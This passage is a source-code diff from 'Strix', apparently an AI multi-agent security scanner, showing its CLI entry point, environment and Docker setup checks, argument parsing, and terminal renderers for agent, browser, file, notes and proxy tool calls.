 from rich.panel import Panel
 from rich.text import Text
 from strix.cli.app import run_strix_cli
 from strix.cli.tracer import get_global_tracer
 from strix.runtime.docker_runtime import STRIX_IMAGE
 logging.getLogger().setLevel(logging.ERROR)
 def format_token_count(count: float) -> str:
    count = int(count)
    if count >= 1_000_000:
        return f"{count / 1_000_000:.1f}M"
    if count >= 1_000:
        return f"{count / 1_000:.1f}K"
    return str(count)
 def validate_environment() -> None:
    console = Console()
    missing_required_vars = []
    missing_optional_vars = []
    if not os.getenv("STRIX_LLM"):
        missing_required_vars.append("STRIX_LLM")
    if not os.getenv("LLM_API_KEY"):
        missing_required_vars.append("LLM_API_KEY")
    if not os.getenv("PERPLEXITY_API_KEY"):
        missing_optional_vars.append("PERPLEXITY_API_KEY")
    if missing_required_vars:
        error_text = Text()
        error_text.append("❌ ", style="bold red")
        error_text.append("MISSING REQUIRED ENVIRONMENT VARIABLES", style="bold red")
        error_text.append("\n\n", style="white")
        for var in missing_required_vars:
            error_text.append(f"• {var}", style="bold yellow")
            error_text.append(" is not set\n", style="white")
        if missing_optional_vars:
            error_text.append(
                "\nOptional (but recommended) environment variables:\n", style="dim white"
            )
            for var in missing_optional_vars:
                error_text.append(f"• {var}", style="dim yellow")
                error_text.append(" is not set\n", style="dim white")
        error_text.append("\nRequired environment variables:\n", style="white")
        error_text.append("• ", style="white")
        error_text.append("STRIX_LLM", style="bold cyan")
        error_text.append(
            " - Model name to use with litellm (e.g., 'anthropic/claude-sonnet-4-20250514')\n",
            style="white",
        )
        error_text.append("• ", style="white")
        error_text.append("LLM_API_KEY", style="bold cyan")
        error_text.append(" - API key for the LLM provider\n", style="white")
        if missing_optional_vars:
            error_text.append("\nOptional environment variables:\n", style="white")
            error_text.append("• ", style="white")
            error_text.append("PERPLEXITY_API_KEY", style="bold cyan")
            error_text.append(
                " - API key for Perplexity AI web search (enables real-time research)\n",
                style="white",
            )
        error_text.append("\nExample setup:\n", style="white")
        error_text.append(
            "export STRIX_LLM='anthropic/claude-sonnet-4-20250514'\n", style="dim white"
        )
        error_text.append("export LLM_API_KEY='your-api-key-here'\n", style="dim white")
        if missing_optional_vars:
            error_text.append(
                "export PERPLEXITY_API_KEY='your-perplexity-key-here'", style="dim white"
            )
        panel = Panel(
            error_text,
            title="[bold red]🛡️  STRIX CONFIGURATION ERROR",
            title_align="center",
            border_style="red",
            padding=(1, 2),
        )
        console.print("\n")
        console.print(panel)
        console.print()
        sys.exit(1)
 def _validate_llm_response(response: Any) -> None:
    if not response or not response.choices or not response.choices[0].message.content:
        raise RuntimeError("Invalid response from LLM")
 async def warm_up_llm() -> None:
    console = Console()
    try:
        model_name = os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
        api_key = os.getenv("LLM_API_KEY")
        if api_key:
            litellm.api_key = api_key
        test_messages = [
            {"role": "system", "content": "You are a helpful assistant."},
            {"role": "user", "content": "Reply with just 'OK'."},
        ]
        response = litellm.completion(
            model=model_name,
            messages=test_messages,
            max_tokens=10,
        )
        _validate_llm_response(response)
    except Exception as e:  # noqa: BLE001
        error_text = Text()
        error_text.append("❌ ", style="bold red")
        error_text.append("LLM CONNECTION FAILED", style="bold red")
        error_text.append("\n\n", style="white")
        error_text.append("Could not establish connection to the language model.\n", style="white")
        error_text.append("Please check your configuration and try again.\n", style="white")
        error_text.append(f"\nError: {e}", style="dim white")
        panel = Panel(
            error_text,
            title="[bold red]🛡️  STRIX STARTUP ERROR",
            title_align="center",
            border_style="red",
            padding=(1, 2),
        )
        console.print("\n")
        console.print(panel)
        console.print()
        sys.exit(1)
 def generate_run_name() -> str:
    # fmt: off
    adjectives = [
        "stealthy", "sneaky", "crafty", "elite", "phantom", "shadow", "silent",
        "rogue", "covert", "ninja", "ghost", "cyber", "digital", "binary",
        "encrypted", "obfuscated", "masked", "cloaked", "invisible", "anonymous"
    ]
    nouns = [
        "exploit", "payload", "backdoor", "rootkit", "keylogger", "botnet", "trojan",
        "worm", "virus", "packet", "buffer", "shell", "daemon", "spider", "crawler",
        "scanner", "sniffer", "honeypot", "firewall", "breach"
    ]
    # fmt: on
    adj = secrets.choice(adjectives)
    noun = secrets.choice(nouns)
    number = secrets.randbelow(900) + 100
    return f"{adj}-{noun}-{number}"
 def infer_target_type(target: str) -> tuple[str, dict[str, str]]:
    if not target or not isinstance(target, str):
        raise ValueError("Target must be a non-empty string")
    target = target.strip()
    parsed = urlparse(target)
    if parsed.scheme in ("http", "https"):
        if any(
            host in parsed.netloc.lower() for host in ["github.com", "gitlab.com", "bitbucket.org"]
        ):
            return "repository", {"target_repo": target}
        return "web_application", {"target_url": target}
    path = Path(target)
    try:
        if path.exists():
            if path.is_dir():
                return "local_code", {"target_path": str(path.absolute())}
            raise ValueError(f"Path exists but is not a directory: {target}")
    except (OSError, RuntimeError) as e:
        raise ValueError(f"Invalid path: {target} - {e!s}") from e
    if target.startswith("git@") or target.endswith(".git"):
        return "repository", {"target_repo": target}
    if "." in target and "/" not in target and not target.startswith("."):
        parts = target.split(".")
        if len(parts) >= 2 and all(p and p.strip() for p in parts):
            return "web_application", {"target_url": f"https://{target}"}
    raise ValueError(
        f"Invalid target: {target}\n"
        "Target must be one of:\n"
        "- A valid URL (http:// or https://)\n"
        "- A Git repository URL (https://github.com/... or git@github.com:...)\n"
        "- A local directory path\n"
        "- A domain name (e.g., example.com)"
    )
 def parse_arguments() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="Strix Multi-Agent Cybersecurity Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
 Examples:
  # Web application scan
  strix --target https://example.com
  # GitHub repository analysis
  strix --target https://github.com/user/repo
  strix --target git@github.com:user/repo.git
  # Local code analysis
  strix --target ./my-project
  # Domain scan
  strix --target example.com
  # Custom instructions
  strix --target example.com --instruction "Focus on authentication vulnerabilities"
        """,
    )
    parser.add_argument(
        "--target",
        type=str,
        required=True,
        help="Target to scan (URL, repository, local directory path, or domain name)",
    )
    parser.add_argument(
        "--instruction",
        type=str,
        help="Custom instructions for the scan. This can be "
        "specific vulnerability types to focus on (e.g., 'Focus on IDOR and XSS'), "
        "testing approaches (e.g., 'Perform thorough authentication testing'), "
        "test credentials (e.g., 'Use the following credentials to access the app: "
        "admin:password123'), "
        "or areas of interest (e.g., 'Check login API endpoint for security issues')",
    )
    parser.add_argument(
        "--run-name",
        type=str,
        help="Custom name for this scan run",
    )
    args = parser.parse_args()
    try:
        args.target_type, args.target_dict = infer_target_type(args.target)
    except ValueError as e:
        parser.error(str(e))
    return args
 def _build_stats_text(tracer: Any) -> Text:
    stats_text = Text()
    if not tracer:
        return stats_text
    vuln_count = len(tracer.vulnerability_reports)
    tool_count = tracer.get_real_tool_count()
    agent_count = len(tracer.agents)
    if vuln_count > 0:
        stats_text.append("🔍 Vulnerabilities Found: ", style="bold red")
        stats_text.append(str(vuln_count), style="bold yellow")
        stats_text.append(" • ", style="dim white")
    stats_text.append("🤖 Agents Used: ", style="bold cyan")
    stats_text.append(str(agent_count), style="bold white")
    stats_text.append(" • ", style="dim white")
    stats_text.append("🛠️ Tools Called: ", style="bold cyan")
    stats_text.append(str(tool_count), style="bold white")
    return stats_text
 def _build_llm_stats_text(tracer: Any) -> Text:
    llm_stats_text = Text()
    if not tracer:
        return llm_stats_text
    llm_stats = tracer.get_total_llm_stats()
    total_stats = llm_stats["total"]
    if total_stats["requests"] > 0:
        llm_stats_text.append("📥 Input Tokens: ", style="bold cyan")
        llm_stats_text.append(format_token_count(total_stats["input_tokens"]), style="bold white")
        if total_stats["cached_tokens"] > 0:
            llm_stats_text.append(" • ", style="dim white")
            llm_stats_text.append("⚡ Cached: ", style="bold green")
            llm_stats_text.append(
                format_token_count(total_stats["cached_tokens"]), style="bold green"
            )
        llm_stats_text.append(" • ", style="dim white")
        llm_stats_text.append("📤 Output Tokens: ", style="bold cyan")
        llm_stats_text.append(format_token_count(total_stats["output_tokens"]), style="bold white")
        if total_stats["cost"] > 0:
            llm_stats_text.append(" • ", style="dim white")
            llm_stats_text.append("💰 Total Cost: $", style="bold cyan")
            llm_stats_text.append(f"{total_stats['cost']:.4f}", style="bold yellow")
    return llm_stats_text
 def display_completion_message(args: argparse.Namespace, results_path: Path) -> None:
    console = Console()
    tracer = get_global_tracer()
    target_value = next(iter(args.target_dict.values())) if args.target_dict else args.target
    completion_text = Text()
    completion_text.append("🦉 ", style="bold white")
    completion_text.append("AGENT FINISHED", style="bold green")
    completion_text.append(" • ", style="dim white")
    completion_text.append("Security assessment completed", style="white")
    stats_text = _build_stats_text(tracer)
    llm_stats_text = _build_llm_stats_text(tracer)
    target_text = Text()
    target_text.append("🎯 Target: ", style="bold cyan")
    target_text.append(str(target_value), style="bold white")
    results_text = Text()
    results_text.append("📊 Results Saved To: ", style="bold cyan")
    results_text.append(str(results_path), style="bold yellow")
    if stats_text.plain:
        if llm_stats_text.plain:
            panel_content = Text.assemble(
                completion_text,
                "\n\n",
                target_text,
                "\n",
                stats_text,
                "\n",
                llm_stats_text,
                "\n",
                results_text,
            )
        else:
            panel_content = Text.assemble(
                completion_text, "\n\n", target_text, "\n", stats_text, "\n", results_text
            )
    elif llm_stats_text.plain:
        panel_content = Text.assemble(
            completion_text, "\n\n", target_text, "\n", llm_stats_text, "\n", results_text
        )
    else:
        panel_content = Text.assemble(completion_text, "\n\n", target_text, "\n", results_text)
    panel = Panel(
        panel_content,
        title="[bold green]🛡️  STRIX CYBERSECURITY AGENT",
        title_align="center",
        border_style="green",
        padding=(1, 2),
    )
    console.print("\n")
    console.print(panel)
    console.print()
 def _check_docker_connection() -> Any:
    try:
        return docker.from_env()
    except DockerException:
        console = Console()
        error_text = Text()
        error_text.append("❌ ", style="bold red")
        error_text.append("DOCKER NOT AVAILABLE", style="bold red")
        error_text.append("\n\n", style="white")
        error_text.append("Cannot connect to Docker daemon.\n", style="white")
        error_text.append("Please ensure Docker is installed and running.\n\n", style="white")
        error_text.append("Try running: ", style="dim white")
        error_text.append("sudo systemctl start docker", style="dim cyan")
        panel = Panel(
            error_text,
            title="[bold red]🛡️  STRIX STARTUP ERROR",
            title_align="center",
            border_style="red",
            padding=(1, 2),
        )
        console.print("\n", panel, "\n")
        sys.exit(1)
 def _image_exists(client: Any) -> bool:
    try:
        client.images.get(STRIX_IMAGE)
    except docker.errors.ImageNotFound:
        return False
    else:
        return True
 def _update_layer_status(layers_info: dict[str, str], layer_id: str, layer_status: str) -> None:
    if "Pull complete" in layer_status or "Already exists" in layer_status:
        layers_info[layer_id] = "✓"
    elif "Downloading" in layer_status:
        layers_info[layer_id] = "↓"
    elif "Extracting" in layer_status:
        layers_info[layer_id] = "📦"
    elif "Waiting" in layer_status:
        layers_info[layer_id] = "⏳"
    else:
        layers_info[layer_id] = "•"
 def _process_pull_line(
    line: dict[str, Any], layers_info: dict[str, str], status: Any, last_update: str
 ) -> str:
    if "id" in line and "status" in line:
        layer_id = line["id"]
        _update_layer_status(layers_info, layer_id, line["status"])
        completed = sum(1 for v in layers_info.values() if v == "✓")
        total = len(layers_info)
        if total > 0:
            update_msg = f"[bold cyan]Progress: {completed}/{total} layers complete"
            if update_msg != last_update:
                status.update(update_msg)
                return update_msg
    elif "status" in line and "id" not in line:
        global_status = line["status"]
        if "Pulling from" in global_status:
            status.update("[bold cyan]Fetching image manifest...")
        elif "Digest:" in global_status:
            status.update("[bold cyan]Verifying image...")
        elif "Status:" in global_status:
            status.update("[bold cyan]Finalizing...")
    return last_update
 def pull_docker_image() -> None:
    console = Console()
    client = _check_docker_connection()
    if _image_exists(client):
        return
    console.print()
    console.print(f"[bold cyan]🐳 Pulling Docker image:[/bold cyan] {STRIX_IMAGE}")
    console.print(
        "[dim yellow]This only happens on first run and may take a few minutes...[/dim yellow]"
    )
    console.print()
    with console.status("[bold cyan]Downloading image layers...", spinner="dots") as status:
        try:
            layers_info: dict[str, str] = {}
            last_update = ""
            for line in client.api.pull(STRIX_IMAGE, stream=True, decode=True):
                last_update = _process_pull_line(line, layers_info, status, last_update)
        except DockerException as e:
            console.print()
            error_text = Text()
            error_text.append("❌ ", style="bold red")
            error_text.append("FAILED TO PULL IMAGE", style="bold red")
            error_text.append("\n\n", style="white")
            error_text.append(f"Could not download: {STRIX_IMAGE}\n", style="white")
            error_text.append(str(e), style="dim red")
            panel = Panel(
                error_text,
                title="[bold red]🛡️  DOCKER PULL ERROR",
                title_align="center",
                border_style="red",
                padding=(1, 2),
            )
            console.print(panel, "\n")
            sys.exit(1)
    success_text = Text()
    success_text.append("✅ ", style="bold green")
    success_text.append("Successfully pulled Docker image", style="green")
    console.print(success_text)
    console.print()
 def main() -> None:
    if sys.platform == "win32":
        asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
    pull_docker_image()
    validate_environment()
    asyncio.run(warm_up_llm())
    args = parse_arguments()
    if not args.run_name:
        args.run_name = generate_run_name()
    asyncio.run(run_strix_cli(args))
    results_path = Path("agent_runs") / args.run_name
    display_completion_message(args, results_path)
 if __name__ == "__main__":
    main()
--- a/strix/cli/tool_components/init.py
+++ b/strix/cli/tool_components/init.py
@@ -0,0 +1,39 @@
 from . import (
    agents_graph_renderer,
    browser_renderer,
    file_edit_renderer,
    finish_renderer,
    notes_renderer,
    proxy_renderer,
    python_renderer,
    reporting_renderer,
    scan_info_renderer,
    terminal_renderer,
    thinking_renderer,
    user_message_renderer,
    web_search_renderer,
 )
 from .base_renderer import BaseToolRenderer
 from .registry import ToolTUIRegistry, get_tool_renderer, register_tool_renderer, render_tool_widget
 __all__ = [
    "BaseToolRenderer",
    "ToolTUIRegistry",
    "agents_graph_renderer",
    "browser_renderer",
    "file_edit_renderer",
    "finish_renderer",
    "get_tool_renderer",
    "notes_renderer",
    "proxy_renderer",
    "python_renderer",
    "register_tool_renderer",
    "render_tool_widget",
    "reporting_renderer",
    "scan_info_renderer",
    "terminal_renderer",
    "thinking_renderer",
    "user_message_renderer",
    "web_search_renderer",
 ]
--- a/strix/cli/tool_components/agents_graph_renderer.py
+++ b/strix/cli/tool_components/agents_graph_renderer.py
@@ -0,0 +1,129 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class ViewAgentGraphRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "view_agent_graph"
    css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:  # noqa: ARG003
        content_text = "🕸️ [bold #fbbf24]Viewing agents graph[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class CreateAgentRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "create_agent"
    css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        task = args.get("task", "")
        name = args.get("name", "Agent")
        header = f"🤖 [bold #fbbf24]Creating {name}[/]"
        if task:
            task_display = task[:400] + "..." if len(task) > 400 else task
            content_text = f"{header}\n  [dim]{cls.escape_markup(task_display)}[/]"
        else:
            content_text = f"{header}\n  [dim]Spawning agent...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class SendMessageToAgentRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "send_message_to_agent"
    css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        message = args.get("message", "")
        header = "💬 [bold #fbbf24]Sending message[/]"
        if message:
            message_display = message[:400] + "..." if len(message) > 400 else message
            content_text = f"{header}\n  [dim]{cls.escape_markup(message_display)}[/]"
        else:
            content_text = f"{header}\n  [dim]Sending...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class AgentFinishRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "agent_finish"
    css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        result_summary = args.get("result_summary", "")
        findings = args.get("findings", [])
        success = args.get("success", True)
        header = (
            "🏁 [bold #fbbf24]Agent completed[/]" if success else "🏁 [bold #fbbf24]Agent failed[/]"
        )
        if result_summary:
            summary_display = (
                result_summary[:400] + "..." if len(result_summary) > 400 else result_summary
            )
            content_parts = [f"{header}\n  [bold]{cls.escape_markup(summary_display)}[/]"]
            if findings and isinstance(findings, list):
                finding_lines = [f"• {finding}" for finding in findings[:3]]
                if len(findings) > 3:
                    finding_lines.append(f"• ... +{len(findings) - 3} more findings")
                content_parts.append(
                    f"  [dim]{chr(10).join([cls.escape_markup(line) for line in finding_lines])}[/]"
                )
            content_text = "\n".join(content_parts)
        else:
            content_text = f"{header}\n  [dim]Completing task...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class WaitForMessageRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "wait_for_message"
    css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        reason = args.get("reason", "Waiting for messages from other agents or user input")
        header = "⏸️ [bold #fbbf24]Waiting for messages[/]"
        if reason:
            reason_display = reason[:400] + "..." if len(reason) > 400 else reason
            content_text = f"{header}\n  [dim]{cls.escape_markup(reason_display)}[/]"
        else:
            content_text = f"{header}\n  [dim]Agent paused until message received...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
--- a/strix/cli/tool_components/base_renderer.py
+++ b/strix/cli/tool_components/base_renderer.py
@@ -0,0 +1,61 @@
 from abc import ABC, abstractmethod
 from typing import Any, ClassVar
 from textual.widgets import Static
 class BaseToolRenderer(ABC):
    tool_name: ClassVar[str] = ""
    css_classes: ClassVar[list[str]] = ["tool-call"]
    @classmethod
    @abstractmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        pass
    @classmethod
    def escape_markup(cls, text: str) -> str:
        return text.replace("[", "\\[").replace("]", "\\]")
    @classmethod
    def format_args(cls, args: dict[str, Any], max_length: int = 500) -> str:
        if not args:
            return ""
        args_parts = []
        for k, v in args.items():
            str_v = str(v)
            if len(str_v) > max_length:
                str_v = str_v[: max_length - 3] + "..."
            args_parts.append(f"  [dim]{k}:[/] {cls.escape_markup(str_v)}")
        return "\n".join(args_parts)
    @classmethod
    def format_result(cls, result: Any, max_length: int = 1000) -> str:
        if result is None:
            return ""
        str_result = str(result).strip()
        if not str_result:
            return ""
        if len(str_result) > max_length:
            str_result = str_result[: max_length - 3] + "..."
        return cls.escape_markup(str_result)
    @classmethod
    def get_status_icon(cls, status: str) -> str:
        status_icons = {
            "running": "[#f59e0b]●[/#f59e0b] In progress...",
            "completed": "[#22c55e]✓[/#22c55e] Done",
            "failed": "[#dc2626]✗[/#dc2626] Failed",
            "error": "[#dc2626]✗[/#dc2626] Error",
        }
        return status_icons.get(status, "[dim]○[/dim] Unknown")
    @classmethod
    def get_css_classes(cls, status: str) -> str:
        base_classes = cls.css_classes.copy()
        base_classes.append(f"status-{status}")
        return " ".join(base_classes)
--- a/strix/cli/tool_components/browser_renderer.py
+++ b/strix/cli/tool_components/browser_renderer.py
@@ -0,0 +1,107 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class BrowserRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "browser_action"
    css_classes: ClassVar[list[str]] = ["tool-call", "browser-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        status = tool_data.get("status", "unknown")
        action = args.get("action", "unknown")
        content = cls._build_sleek_content(action, args)
        css_classes = cls.get_css_classes(status)
        return Static(content, classes=css_classes)
    @classmethod
    def _build_sleek_content(cls, action: str, args: dict[str, Any]) -> str:
        browser_icon = "🌐"
        url = args.get("url")
        text = args.get("text")
        js_code = args.get("js_code")
        if action in [
            "launch",
            "goto",
            "new_tab",
            "type",
            "execute_js",
            "click",
            "double_click",
            "hover",
        ]:
            if action == "launch":
                display_url = cls._format_url(url) if url else None
                message = (
                    f"launching {display_url} on browser" if display_url else "launching browser"
                )
            elif action == "goto":
                display_url = cls._format_url(url) if url else None
                message = f"navigating to {display_url}" if display_url else "navigating"
            elif action == "new_tab":
                display_url = cls._format_url(url) if url else None
                message = f"opening tab {display_url}" if display_url else "opening tab"
            elif action == "type":
                display_text = cls._format_text(text) if text else None
                message = f"typing {display_text}" if display_text else "typing"
            elif action == "execute_js":
                display_js = cls._format_js(js_code) if js_code else None
                message = (
                    f"executing javascript\n{display_js}" if display_js else "executing javascript"
                )
            else:
                action_words = {
                    "click": "clicking",
                    "double_click": "double clicking",
                    "hover": "hovering",
                }
                message = action_words[action]
            return f"{browser_icon} [#06b6d4]{message}[/]"
        simple_actions = {
            "back": "going back in browser history",
            "forward": "going forward in browser history",
            "refresh": "refreshing browser tab",
            "close_tab": "closing browser tab",
            "switch_tab": "switching browser tab",
            "list_tabs": "listing browser tabs",
            "view_source": "viewing page source",
            "screenshot": "taking screenshot of browser tab",
            "wait": "waiting...",
            "close": "closing browser",
        }
        if action in simple_actions:
            return f"{browser_icon} [#06b6d4]{simple_actions[action]}[/]"
        return f"{browser_icon} [#06b6d4]{action}[/]"
    @classmethod
    def _format_url(cls, url: str) -> str:
        if len(url) > 300:
            url = url[:297] + "..."
        return cls.escape_markup(url)
    @classmethod
    def _format_text(cls, text: str) -> str:
        if len(text) > 200:
            text = text[:197] + "..."
        return cls.escape_markup(text)
    @classmethod
    def _format_js(cls, js_code: str) -> str:
        if len(js_code) > 200:
            js_code = js_code[:197] + "..."
        return f"[white]{cls.escape_markup(js_code)}[/white]"
--- a/strix/cli/tool_components/file_edit_renderer.py
+++ b/strix/cli/tool_components/file_edit_renderer.py
@@ -0,0 +1,95 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class StrReplaceEditorRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "str_replace_editor"
    css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        result = tool_data.get("result")
        command = args.get("command", "")
        path = args.get("path", "")
        if command == "view":
            header = "📖 [bold #10b981]Reading file[/]"
        elif command == "str_replace":
            header = "✏️ [bold #10b981]Editing file[/]"
        elif command == "create":
            header = "📝 [bold #10b981]Creating file[/]"
        else:
            header = "📄 [bold #10b981]File operation[/]"
        if (result and isinstance(result, dict) and "content" in result) or path:
            path_display = path[-60:] if len(path) > 60 else path
            content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
        else:
            content_text = f"{header} [dim]Processing...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class ListFilesRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "list_files"
    css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        path = args.get("path", "")
        header = "📂 [bold #10b981]Listing files[/]"
        if path:
            path_display = path[-60:] if len(path) > 60 else path
            content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
        else:
            content_text = f"{header} [dim]Current directory[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class SearchFilesRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "search_files"
    css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        path = args.get("path", "")
        regex = args.get("regex", "")
        header = "🔍 [bold purple]Searching files[/]"
        if path and regex:
            path_display = path[-30:] if len(path) > 30 else path
            regex_display = regex[:30] if len(regex) > 30 else regex
            content_text = (
                f"{header} [dim]{cls.escape_markup(path_display)} for "
                f"'{cls.escape_markup(regex_display)}'[/]"
            )
        elif path:
            path_display = path[-60:] if len(path) > 60 else path
            content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
        elif regex:
            regex_display = regex[:60] if len(regex) > 60 else regex
            content_text = f"{header} [dim]'{cls.escape_markup(regex_display)}'[/]"
        else:
            content_text = f"{header} [dim]Searching...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
--- a/strix/cli/tool_components/finish_renderer.py
+++ b/strix/cli/tool_components/finish_renderer.py
@@ -0,0 +1,32 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class FinishScanRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "finish_scan"
    css_classes: ClassVar[list[str]] = ["tool-call", "finish-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        content = args.get("content", "")
        success = args.get("success", True)
        header = (
            "🏁 [bold #dc2626]Finishing Scan[/]" if success else "🏁 [bold #dc2626]Scan Failed[/]"
        )
        if content:
            content_display = content[:600] + "..." if len(content) > 600 else content
            content_text = f"{header}\n  [bold]{cls.escape_markup(content_display)}[/]"
        else:
            content_text = f"{header}\n  [dim]Generating final report...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
--- a/strix/cli/tool_components/notes_renderer.py
+++ b/strix/cli/tool_components/notes_renderer.py
@@ -0,0 +1,108 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class CreateNoteRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "create_note"
    css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        title = args.get("title", "")
        content = args.get("content", "")
        header = "📝 [bold #fbbf24]Note[/]"
        if title:
            title_display = title[:100] + "..." if len(title) > 100 else title
            note_parts = [f"{header}\n  [bold]{cls.escape_markup(title_display)}[/]"]
            if content:
                content_display = content[:200] + "..." if len(content) > 200 else content
                note_parts.append(f"  [dim]{cls.escape_markup(content_display)}[/]")
            content_text = "\n".join(note_parts)
        else:
            content_text = f"{header}\n  [dim]Creating note...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class DeleteNoteRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "delete_note"
    css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:  # noqa: ARG003
        header = "🗑️ [bold #fbbf24]Delete Note[/]"
        content_text = f"{header}\n  [dim]Deleting...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class UpdateNoteRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "update_note"
    css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        title = args.get("title", "")
        content = args.get("content", "")
        header = "✏️ [bold #fbbf24]Update Note[/]"
        if title or content:
            note_parts = [header]
            if title:
                title_display = title[:100] + "..." if len(title) > 100 else title
                note_parts.append(f"  [bold]{cls.escape_markup(title_display)}[/]")
            if content:
                content_display = content[:200] + "..." if len(content) > 200 else content
                note_parts.append(f"  [dim]{cls.escape_markup(content_display)}[/]")
            content_text = "\n".join(note_parts)
        else:
            content_text = f"{header}\n  [dim]Updating...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
@register_tool_renderer
 class ListNotesRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "list_notes"
    css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        result = tool_data.get("result")
        header = "📋 [bold #fbbf24]Listing notes[/]"
        if result and isinstance(result, dict) and "notes" in result:
            notes = result["notes"]
            if isinstance(notes, list):
                count = len(notes)
                content_text = f"{header}\n  [dim]{count} notes found[/]"
            else:
                content_text = f"{header}\n  [dim]No notes found[/]"
        else:
            content_text = f"{header}\n  [dim]Listing notes...[/]"
        css_classes = cls.get_css_classes("completed")
        return Static(content_text, classes=css_classes)
--- a/strix/cli/tool_components/proxy_renderer.py
+++ b/strix/cli/tool_components/proxy_renderer.py
@@ -0,0 +1,255 @@
 from typing import Any, ClassVar
 from textual.widgets import Static
 from .base_renderer import BaseToolRenderer
 from .registry import register_tool_renderer
@register_tool_renderer
 class ListRequestsRenderer(BaseToolRenderer):
    tool_name: ClassVar[str] = "list_requests"
    css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
    @classmethod
    def render(cls, tool_data: dict[str, Any]) -> Static:
        args = tool_data.get("args", {})
        result = tool_data.get("result")
        httpql_filter = args.get("httpql_filter")
        header = "📋 [bold #06b6d4]Listing requests[/]"
        if result and isinstance(result, dict) and "requests" in result:
            requests = result["requests"]
            if isinstance(requests, list) and requests:
                request_lines = []
                for req in requests[:3]:
                    if isinstance(req, dict):
                        method = req.get("method", "?")
                        path = req.get("path", "?")
